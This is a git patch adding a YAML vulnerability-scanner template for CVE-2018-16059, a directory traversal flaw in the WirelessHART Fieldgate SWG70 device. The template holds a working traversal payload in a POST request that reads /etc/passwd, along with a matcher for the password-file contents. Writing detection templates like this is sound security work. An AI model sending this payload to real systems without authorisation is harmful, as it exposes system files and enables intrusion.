From 5a5b5ea18edb8697c9b5072d325b2d8bf299c660 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 19 Jul 2021 17:16:19 +0700 Subject: [PATCH] Create CVE-2018-16059.yaml --- cves/2018/CVE-2018-16059.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2018/CVE-2018-16059.yaml diff --git a/cves/2018/CVE-2018-16059.yaml b/cves/2018/CVE-2018-16059.yaml new file mode 100644 index 0000000000..030e0e9f95 --- /dev/null +++ b/cves/2018/CVE-2018-16059.yaml @@ -0,0 +1,26 @@ +id: CVE-2018-16059 + +info: + name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal + author: daffainfo + severity: high + reference: https://www.exploit-db.com/exploits/45342 + tags: cve,cve2018,iot,lfi + +requests: + - method: POST + path: + - "{{BaseURL}}/fcgi-bin/wgsetcgi" + body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + part: body + + - type: status + status: + - 200